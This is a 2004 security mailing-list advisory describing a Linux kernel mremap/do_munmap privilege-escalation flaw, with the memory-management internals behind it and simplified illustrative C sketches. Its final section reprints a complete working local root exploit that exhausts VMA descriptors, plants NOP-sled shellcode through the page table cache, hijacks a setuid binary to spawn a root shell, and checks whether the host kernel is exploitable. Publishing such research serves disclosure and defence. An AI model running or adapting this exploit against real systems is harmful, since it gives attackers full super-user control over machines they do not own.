[UNIX] Linux Kernel do_mremap VMA Limit Local Privilege Escalation (Technical Details)

From: SecuriTeam (support_at_securiteam.com)
Date: 03/02/04

    To: list@securiteam.com
    Date: 2 Mar 2004 19:11:00 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Linux Kernel do_mremap VMA Limit Local Privilege Escalation (Technical
    Details)
    ------------------------------------------------------------------------

    SUMMARY

    A critical security vulnerability has been found in the Linux kernel
    memory management code inside the mremap(2) system call, caused by a
    missing check of a function return value. This bug is completely
    unrelated to the mremap bug disclosed on 05-01-2004, except that it
    concerns the same internal kernel function code.

    DETAILS

    Vulnerable Systems:
     * Linux version 2.2 up to and including 2.2.25
     * Linux version 2.4 up to and including 2.4.24
     * Linux version 2.6 up to and including 2.6.2

    The Linux kernel manages a list of user-addressable valid memory locations
    on a per-process basis. Every process owns a singly linked list of
    so-called virtual memory area descriptors (from now on just VMAs).
    Every VMA describes the start of a valid memory region, its length, and
    various memory flags such as page protection.
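
    As a rough illustration of the descriptor list just described, the
    following sketch models a VMA list and an address lookup. The names
    toy_vma and toy_find_vma are hypothetical and the structure is heavily
    simplified; it is not the kernel's actual vm_area_struct.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, simplified stand-in for a VMA descriptor. */
struct toy_vma {
    unsigned long start;   /* first address of the region */
    unsigned long end;     /* first address past the region */
    unsigned long flags;   /* protection bits, e.g. read/write */
    struct toy_vma *next;  /* next region, sorted by address */
};

/* Return the VMA containing addr, or NULL if addr is not mapped. */
static struct toy_vma *toy_find_vma(struct toy_vma *head, unsigned long addr)
{
    for (struct toy_vma *v = head; v != NULL; v = v->next) {
        assert(v->start < v->end);  /* every region is non-empty */
        if (addr < v->start)
            return NULL;            /* list is sorted: addr lies in a gap */
        if (addr < v->end)
            return v;
    }
    return NULL;
}
```

    An address is valid for the process only if such a lookup finds a
    descriptor covering it.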

    Every VMA in the list corresponds to a part of the process's page table.
    The page table contains descriptors (page table entries, or PTEs for
    short) of the physical memory pages seen by the process. A VMA descriptor
    can thus be understood as a high-level description of a particular region
    of the process's page table, storing PTE properties such as the page R/W
    flag.

    The mremap() system call resizes (shrinks or grows) existing virtual
    memory areas, or any part of them, and can move them within the
    process's addressable space.

    Moving a part of the virtual memory from inside a VMA area to a new
    location requires creation of a new VMA descriptor as well as copying the
    underlying page table entries described by the VMA from the old to the new
    location in the process's page table.

    To accomplish this task the do_mremap() code calls the do_munmap()
    internal kernel function to remove any potentially existing old memory
    mapping in the new location as well as to remove the old virtual memory
    mapping. Unfortunately the code doesn't test the return value of the
    do_munmap() function, which may fail if the maximum number of available
    VMA descriptors has been exceeded. This happens if one tries to unmap the
    middle part of an existing memory mapping and the process's limit on the
    number of VMAs (currently 65535) has been reached.

    One of the possible situations can be illustrated with the following
    picture. The corresponding page table entries (PTEs) have been marked with
    o and x:

    Before mremap():

    (oooooooooooooooooooooooo) (xxxxxxxxxxxx)
    [----------VMA1----------] [----VMA2----]
          [REMAPPED-VMA] <---------------|

    After mremap() without VMA limit:

    (oooo)(xxxxxxxxxxxx)(oooo)
    [VMA3][REMAPPED-VMA][VMA4]

    After mremap() with the VMA limit reached:

    (ooooxxxxxxxxxxxxxxoooo)
    [---------VMA1---------]
         [REMAPPED-VMA]

    After the maximum number of VMAs in the process's VMA list has been
    reached do_munmap() will refuse to create the necessary VMA hole because
    it would split the original VMA in two disjoint VMA areas exceeding the
    VMA descriptor limit.
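
    The failure mode and the missing check can be sketched in user space as
    follows. This is a toy model under stated assumptions: toy_mm,
    toy_munmap and toy_remap_checked are hypothetical names, the model tracks
    a single region and only its descriptor count, and the limit value is the
    one quoted above. It is not the kernel code.

```c
#include <assert.h>
#include <errno.h>

#define TOY_MAX_MAP_COUNT 65535   /* limit quoted in the advisory text */

/* Hypothetical model: one region [start, end) plus the VMA count. */
struct toy_mm {
    unsigned long start, end;
    int map_count;
};

/*
 * Model of unmapping [addr, addr+len) from the single region in mm.
 * Cutting a hole strictly inside the region needs one extra descriptor,
 * so it fails with -ENOMEM once the count has reached the limit.
 * The region bounds themselves are left untouched in this toy.
 */
static int toy_munmap(struct toy_mm *mm, unsigned long addr, unsigned long len)
{
    unsigned long end = addr + len;

    assert(len != 0);
    if (addr > mm->start && end < mm->end) {
        if (mm->map_count >= TOY_MAX_MAP_COUNT)
            return -ENOMEM;     /* split refused, nothing was unmapped */
        mm->map_count++;        /* region split into two descriptors */
    }
    return 0;
}

/* A caller that propagates the failure instead of ignoring it. */
static int toy_remap_checked(struct toy_mm *mm, unsigned long addr,
                             unsigned long len)
{
    int ret = toy_munmap(mm, addr, len);

    if (ret < 0)
        return ret;             /* the kind of check described as missing */
    /* ... only at this point would page table entries be moved ... */
    return 0;
}
```

    The point of the sketch is only that the caller must stop when the unmap
    step reports an error, because the hole it relies on was never created.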

    Due to the missing return value check after trying to unmap the middle of
    VMA1 (this is the first invocation of do_munmap() inside the do_mremap()
    code), the corresponding page table entries from VMA2 are still inserted
    into the page table location described by VMA1 and are thus subject to
    VMA1's page protection flags. It must also be mentioned that the original
    PTEs in VMA1 are lost, leaving the corresponding page frames unusable
    forever.

    The kernel also tries to insert the overlapping VMA into the VMA
    descriptor list, but this fails due to further checks in the low-level
    VMA manipulation code. The low-level VMA list check in the 2.4 and 2.6
    kernel versions just calls BUG(), thereby terminating the malicious
    process.

    There are also two other unchecked calls to do_munmap() inside the
    do_mremap() code, and we believe that the second occurrence of the
    unchecked do_munmap() is also exploitable. The second occurrence takes
    place if the VMA to be remapped is being truncated in place. Note that
    do_munmap() can also fail under an exceptionally low memory condition
    while trying to allocate a VMA descriptor.

    Exploitation:
    The vulnerability turned out to be very easily exploitable. Our first
    idea was to move PTEs from one VMA mapping a read-only file (like
    /etc/passwd) to another, writable VMA. This approach failed because,
    after the BUG() macro has been invoked, the mmap semaphore of the memory
    descriptor is left in a locked (that is, down_write()) state, preventing
    any further memory operations that acquire the semaphore in other clone
    threads.

    Our attention then turned to the page table cache code, which was
    introduced early in the 2.4 series but not enabled by default. Kernels
    later than 2.4.19 enable the page table cache. The basic idea of a page
    table cache is to keep free page frames recently used for page tables in
    a linked list to speed up the allocation of new page tables.

    On Linux every process owns a reference to a memory descriptor (mm_struct)
    which contains a pointer to a page directory. The page directory is a
    single page frame (we describe the case of 4 KB pages without PAE)
    containing 1024 pointers to page tables. A single page table page on
    the i386 architecture holds 1024 PTEs describing up to 4 MB of the
    process's virtual memory. A single PTE contains the physical address of
    the page mapped at the PTE's virtual address and the page access rights.
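
    The two-level layout described above (1024 directory entries, 1024 PTEs
    per table, 4 KB pages, no PAE) implies a fixed split of a 32-bit virtual
    address into a 10-bit directory index, a 10-bit table index and a 12-bit
    page offset. A minimal sketch of that arithmetic follows; the toy_ names
    are ours and are not kernel macros.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_PAGE_SHIFT      12      /* 4 KB pages */
#define TOY_PGDIR_SHIFT     22      /* each directory entry spans 4 MB */
#define TOY_PTRS_PER_TABLE  1024u   /* entries per directory or table */

/* Index of the page directory entry (and thus page table) for vaddr. */
static uint32_t toy_pgd_index(uint32_t vaddr)
{
    return vaddr >> TOY_PGDIR_SHIFT;
}

/* Index of the PTE inside that page table. */
static uint32_t toy_pte_index(uint32_t vaddr)
{
    return (vaddr >> TOY_PAGE_SHIFT) & (TOY_PTRS_PER_TABLE - 1);
}

/* Byte offset inside the 4 KB page. */
static uint32_t toy_page_offset(uint32_t vaddr)
{
    uint32_t off = vaddr & ((1u << TOY_PAGE_SHIFT) - 1);

    assert(off < (1u << TOY_PAGE_SHIFT));
    return off;
}
```

    For example, address 0x40000000 falls into directory slot 256 and address
    0xbfc00000 into slot 767, the last slot below the 3 GB boundary.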

    Page tables are allocated on demand when a page fault occurs. They are
    also freed, and the corresponding page frames released to the memory
    manager, if a process unmaps a part of its virtual memory spanning at
    least one whole page table page, that is, a region containing at least
    one 4 MB sized and 4 MB aligned memory area.
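
    The condition in the preceding paragraph is simple address arithmetic. As
    a sketch (the function name is hypothetical, and 64-bit integers are used
    only to avoid overflow near the top of the 32-bit address space), a range
    [start, end) contains a complete page table's worth of memory if rounding
    start up to the next 4 MB boundary still leaves 4 MB before end:

```c
#include <assert.h>
#include <stdint.h>

#define TOY_TABLE_SPAN (1ull << 22)   /* 4 MB covered by one page table */

/* Return 1 if [start, end) contains a whole 4 MB aligned 4 MB block. */
static int toy_covers_full_table(uint64_t start, uint64_t end)
{
    uint64_t first;

    assert(start <= end);
    /* Round start up to the next 4 MB boundary. */
    first = (start + TOY_TABLE_SPAN - 1) & ~(TOY_TABLE_SPAN - 1);
    return first + TOY_TABLE_SPAN <= end;
}
```

    A range that is 4 MB long but not 4 MB aligned therefore does not free
    any page table page by itself.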

    There are two paths if a new page table must be allocated: the slow and
    the fast one. The fast path takes one page from the head of the page table
    cache while the slow one just calls get_free_page(). This works well if
    the pages from the page table cache have been properly cleared before
    inserting them into the cache. Normally the page tables are cleared by
    zap_page_range() which is called from do_munmap. It is very important for
    the proper operation of the Linux memory management that all locations of
    the process's page table actually containing a valid PTE are covered by
    the corresponding VMA descriptor.
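
    To make the fast and slow allocation paths concrete, here is a small
    user-space model of such a cache. It is only a sketch: the toy_ names are
    hypothetical, calloc() stands in for the slow path, and the use of entry
    0 as the list link follows the description given later in this text. The
    model shows why the scheme depends on tables being cleared before they
    are cached: the fast path hands a table back without touching entries
    1..1023.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

#define TOY_ENTRIES 1024

/* Hypothetical stand-in for one page table page. */
struct toy_table { uintptr_t entry[TOY_ENTRIES]; };

static struct toy_table *toy_cache_head;   /* head of the cached free list */

/* Release a table to the cache; entry[0] is reused as the list link. */
static void toy_table_free(struct toy_table *t)
{
    assert(t != NULL);
    t->entry[0] = (uintptr_t)toy_cache_head;
    toy_cache_head = t;
}

/* Allocate a table: fast path from the cache, else zeroed slow path. */
static struct toy_table *toy_table_alloc(void)
{
    struct toy_table *t = toy_cache_head;

    if (t != NULL) {                        /* fast path */
        toy_cache_head = (struct toy_table *)t->entry[0];
        t->entry[0] = 0;                    /* only the link word is reset */
        return t;
    }
    return calloc(1, sizeof *t);            /* slow path */
}

/* Count non-zero entries, i.e. entries that would look populated. */
static int toy_table_count_set(const struct toy_table *t)
{
    int n = 0;

    for (int i = 0; i < TOY_ENTRIES; i++)
        if (t->entry[i] != 0)
            n++;
    return n;
}
```

    In this model a table freed with a stale entry comes back from the fast
    path with that entry intact, which is the invariant violation the
    following paragraphs build on.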

    In the case of the unchecked do_munmap inside the mremap code we have
    found a condition leaving a part of the page table uncovered by a VMA. The
    offending code is:

    [269] if (old_len >= new_len) {
      do_munmap(current->mm, addr+new_len, old_len - new_len);
      if (!(flags & MREMAP_FIXED) || (new_addr == addr))
       goto out;
     }

    This piece of code is responsible for truncating, in place, the VMA the
    user wants to remap. It is easy to see that do_munmap() will fail if
    [addr+new_len, addr+new_len + (old_len-new_len)] falls into the middle of
    a VMA and the maximum number of allowed VMA descriptors has already been
    used by the process. This also means that the page table will still
    contain valid PTEs from addr+new_len on. Later in the mremap code a part
    of the corresponding VMA is moved and truncated:

    [179] if (!move_page_tables(current->mm, new_addr, addr, old_len)) {
      unsigned long vm_locked = vma->vm_flags & VM_LOCKED;

      if (allocated_vma) {
       *new_vma = *vma;
       new_vma->vm_start = new_addr;
       new_vma->vm_end = new_addr+new_len;
       new_vma->vm_pgoff += (addr-vma->vm_start) >> PAGE_SHIFT;

    but more PTEs (namely old_len) than the length of the created VMA are
    moved from the old location if a new location has been specified along
    with the MREMAP_MAYMOVE flag. This works well only if the previous
    do_munmap did not fail. This situation can be illustrated as follows:

    before mremap:

           <-- old_len -->
    (oooooooooooooooooooooooooooo)
    [------|-----VMA1-----|------]
                |---------------------------------> new_addr

    after mremap, no VMA limit:
          new_len
    (oooooo) (oooooo) (oooooo)
    [-VMA1-] [-VMA3-] [-VMA2-]

    after mremap with the VMA limit reached:
          new_len [*]
    (oooooo oooooo) (oooooo)ooooooooo
    [-----------VMA1-------------] [-VMA2-]
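
    The length mismatch shown in the diagram can be put into numbers. The
    helper below is a hypothetical illustration, not kernel code: it assumes
    page-aligned lengths and simply returns how many pages have their PTEs
    moved (old_len worth) beyond what the new VMA covers (new_len worth) when
    the in-place truncation has failed.

```c
#include <assert.h>

#define TOY_PAGE_SIZE 4096ul

/* Pages whose PTEs are moved although the new VMA does not cover them. */
static unsigned long toy_ownerless_pages(unsigned long old_len,
                                         unsigned long new_len,
                                         int truncate_failed)
{
    assert(old_len % TOY_PAGE_SIZE == 0);
    assert(new_len % TOY_PAGE_SIZE == 0);

    /* If the truncation worked, or nothing shrinks, nothing is left over. */
    if (!truncate_failed || old_len <= new_len)
        return 0;
    return (old_len - new_len) / TOY_PAGE_SIZE;
}
```

    With an old length of 8 pages and a new length of 2 pages, a failed
    truncation leaves 6 pages of entries outside any descriptor in this
    model.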

    Those [*] 'ownerless' PTEs in the page table can be further exploited
    since the memory manager has lost track of them. If the process now
    unmaps a sufficiently big area of memory covering those ownerless PTEs,
    the underlying page table frame will be inserted into the page table
    cache but will still contain valid PTEs. That means that on the next page
    table frame allocation inside a process P for an address A our PTEs will
    appear in the page table of process P! If that process then accesses the
    virtual memory at address A, no page fault will occur as long as the PTEs
    have appropriate (read or write) access rights. In other words: through
    the page table cache we are able to insert any data into the virtual
    memory space of another process.

    Our code goes through a setuid binary, although this is not the only
    possibility. We prepare the page table cache so that there is a single
    empty page frame at the head of the cache, followed by a special page
    table containing 'self executing' pages. To fully understand how it works
    we must dig into the execve() system call.

    If a user calls execve() the kernel removes all traces of the current
    executable, including the virtual memory areas and page tables allocated
    to the process. Then a new VMA for the stack is created at the top of the
    virtual memory, where the program environment and arguments to the new
    binary are stored (they have been preserved in kernel memory). This
    causes a first page table frame to be allocated for the virtual memory
    region ranging from 0xbfc00000 to 0xc0000000.

    Next, the .text and .data sections of the binary to be executed, as well
    as the program interpreter responsible for further loading, are mapped
    into the fresh virtual memory space. For the ELF format this is usually
    the ld.so dynamic linker. At this point the kernel does not allocate the
    underlying page tables. Only VMA descriptors are inserted into the
    process's VMA list.

    After doing some more work that is not relevant here, the kernel
    transfers control to the dynamic linker to execute the binary. This causes
    a second page fault and triggers demand loading of the first code page of
    the dynamic linker. On a standard Linux kernel this will also allocate a
    page frame for the page table ranging from 0x40000000 to 0x40400000.

    On a kernel with page table cache enabled both allocations will take page
    frames from the cache first. That means that if the second page in the
    cached page list contains valid PTEs those could appear instead of the
    regular dynamic linker code. It is easy to place the PTEs so that they
    will shadow the code section of the dynamic linker. Note that the first
    PTE entry of a page is used by the cache code to maintain the page list.
    In our code we populate the page table cache with special frames
    containing PTEs to pages with a short shell code at the end of the page
    and fill the pages with a NOP landing zone.

    We must also mention that the first mremap hole, disclosed on 05-01-2004,
    can also be exploited very easily through the page table cache. Details
    are left to the skilled reader.

    A second possibility to exploit the mremap bug is to create another VMA
    covering ownerless PTEs from a read-only file like /etc/passwd.

    Impact:
    Since no special privileges are required to use the mremap(2) system call
    any process may use its unexpected behavior to disrupt the kernel memory
    management subsystem.

    Proper exploitation of this vulnerability leads to local privilege
    escalation giving an attacker full super-user privileges. The
    vulnerability may also lead to a denial-of-service attack on the available
    system memory.

    Kernel versions tested and known to be vulnerable are all <= 2.2.25, <=
    2.4.24 and <= 2.6.2. The 2.2.25 version of the Linux kernel does not
    recognize the MREMAP_FIXED flag, but this does not prevent the bug from
    being successfully exploited. All users are encouraged to patch all
    vulnerable systems as soon as appropriate vendor patches are released.
    There is no hotfix for this vulnerability. Limiting per-user virtual
    memory does not help, because do_munmap() can still fail.

    Exploit:
    /*
     *
     * mremap missing do_munmap return check kernel exploit
     *
     * gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
     * ./mremap_pte [suid] [[shell]]
     *
     * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
     *
     * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
     * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
     * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <unistd.h>
    #include <syscall.h>
    #include <signal.h>
    #include <time.h>
    #include <sched.h>

    #include <sys/mman.h>
    #include <sys/wait.h>
    #include <sys/utsname.h>

    #include <asm/page.h>

    #define str(s) #s
    #define xstr(s) str(s)

    // this is for standard kernels with 3/1 split
    #define STARTADDR 0x40000000
    #define PGD_SIZE (PAGE_SIZE * 1024)
    #define VICTIM (STARTADDR + PGD_SIZE)
    #define MMAP_BASE (STARTADDR + 3*PGD_SIZE)

    #define DSIGNAL SIGCHLD
    #define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)

    #define MREMAP_MAYMOVE ( (1UL) << 0 )
    #define MREMAP_FIXED ( (1UL) << 1 )

    #define __NR_sys_mremap __NR_mremap

    // how many ld.so pages? this is the .text section length (like from cat
    // /proc/self/maps) in pages
    #define LINKERPAGES 0x14

    // suid victim
    static char *suid="/bin/ping";

    // shell to start
    static char *launch="/bin/bash";

    _syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
       ulong, e);
    unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
        unsigned long new_len, unsigned long flags,
        unsigned long new_addr);

    static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
    static int i, pid=0;
    static char *env[2], *argv[2];
    static ulong ret;

    // code to appear inside the suid image
    static void suid_code(void)
    {
    __asm__(
     " call callme \n"

    // setresuid(0, 0, 0), setresgid(0, 0, 0)
     "jumpme: xorl %ebx, %ebx \n"
     " xorl %ecx, %ecx \n"
     " xorl %edx, %edx \n"
     " xorl %eax, %eax \n"
     " mov $"xstr(__NR_setresuid)", %al \n"
     " int $0x80 \n"
     " mov $"xstr(__NR_setresgid)", %al \n"
     " int $0x80 \n"

    // execve(launch)
     " popl %ebx \n"
     " andl $0xfffff000, %ebx \n"
     " xorl %eax, %eax \n"
     " pushl %eax \n"
     " movl %esp, %edx \n"
     " pushl %ebx \n"
     " movl %esp, %ecx \n"
     " mov $"xstr(__NR_execve)", %al \n"
     " int $0x80 \n"

    // exit
     " xorl %eax, %eax \n"
     " mov $"xstr(__NR_exit)", %al \n"
     " int $0x80 \n"

     "callme: jmp jumpme \n"
     );
    }

    static int suid_code_end(int v)
    {
    return v+1;
    }

    static inline void get_esp(void)
    {
    __asm__(
     " movl %%esp, %%eax \n"
     " andl $0xfffff000, %%eax \n"
     " movl %%eax, %0 \n"
     : : "m"(old_esp)
     );
    }

    static inline void cloneme(void)
    {
    __asm__(
     " pusha \n"
     " movl $("xstr(CLONEFL)"), %%ebx \n"
     " movl %%esp, %%ecx \n"
     " movl $"xstr(__NR_clone)", %%eax \n"
     " int $0x80 \n"
     " movl %%eax, %0 \n"
     " popa \n"
     : : "m"(pid)
     );
    }

    static inline void my_execve(void)
    {
    __asm__(
     " movl %1, %%ebx \n"
     " movl %2, %%ecx \n"
     " movl %3, %%edx \n"
     " movl $"xstr(__NR_execve)", %%eax \n"
     " int $0x80 \n"
     : "=a"(ret)
     : "m"(suid), "m"(argv), "m"(env)
     );
    }

    static inline void pte_populate(unsigned addr)
    {
    unsigned r;
    char *ptr;

     memset((void*)addr, 0x90, PAGE_SIZE);
     r = ((unsigned)suid_code_end) - ((unsigned)suid_code);
     ptr = (void*) (addr + PAGE_SIZE);
     ptr -= r+1;
     memcpy(ptr, suid_code, r);
     memcpy((void*)addr, launch, strlen(launch)+1);
    }

    // hit VMA limit & populate PTEs
    static void exhaust(void)
    {
    // mmap PTE donor
     t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,
        MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
     if(MAP_FAILED==t)
      goto failed;

    // prepare shell code pages
     for(i=2; i<LINKERPAGES+1; i++)
      pte_populate(victim + PAGE_SIZE*i);
     i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);
     if(i)
      goto failed;

    // lock unmap
     base = MMAP_BASE;
     cnt = 0;
     prot = PROT_READ;
     printf("\n"); fflush(stdout);
     for(;;) {
      t = mmap((void*)base, PAGE_SIZE, prot,
        MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
      if(MAP_FAILED==t) {
       if(ENOMEM==errno)
        break;
       else
        goto failed;
      }
      if( !(cnt%512) || cnt>65520 )
       printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base,
       base+PAGE_SIZE); fflush(stdout);
      base += PAGE_SIZE;
      prot ^= PROT_EXEC;
      cnt++;
     }

    // move PTEs & populate page table cache
     ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,
        MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
     if(-1==ret)
      goto failed;

     munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
     t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE,
       PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0,
       0);
     if(MAP_FAILED==t)
      goto failed;

     *t = *((unsigned *)old_esp);
     munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
     printf("\n[+] Success\n\n"); fflush(stdout);
     return;

    failed:
     printf("\n[-] Failed\n"); fflush(stdout);
     _exit(0);
    }

    static inline void check_kver(void)
    {
    static struct utsname un;
    int a=0, b=0, c=0, v=0, e=0, n;

     uname(&un);
     n=sscanf(un.release, "%d.%d.%d", &a, &b, &c);
     if(n!=3 || a!=2) {
      printf("\n[-] invalid kernel version string\n");
      _exit(0);
     }

     if(b==2) {
      if(c<=25)
       v=1;
     }
     else if(b==3) {
      if(c<=99)
       v=1;
     }
     else if(b==4) {
      if(c>18 && c<=24)
       v=1, e=1;
      else if(c>24)
       v=0, e=0;
      else
       v=1, e=0;
     }
     else if(b==5 && c<=75)
      v=1, e=1;
     else if(b==6 && c<=2)
      v=1, e=1;

     printf("\n[+] kernel %s vulnerable: %s exploitable %s",
      un.release, v? "YES" : "NO", e? "YES" : "NO" );
     fflush(stdout);

     if(v && e)
      return;
     _exit(0);
    }

    int main(int ac, char **av)
    {
    // prepare
     check_kver();
     memset(env, 0, sizeof(env));
     memset(argv, 0, sizeof(argv));
     if(ac>1) suid=av[1];
     if(ac>2) launch=av[2];
     argv[0] = suid;
     get_esp();

    // mmap & clone & execve
     exhaust();
     cloneme();
     if(!pid) {
      my_execve();
     } else {
      waitpid(pid, 0, 0);
     }

    return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by Paul Starzetz <ihaquer@isec.pl>.

    The original article can be found at:
    http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt



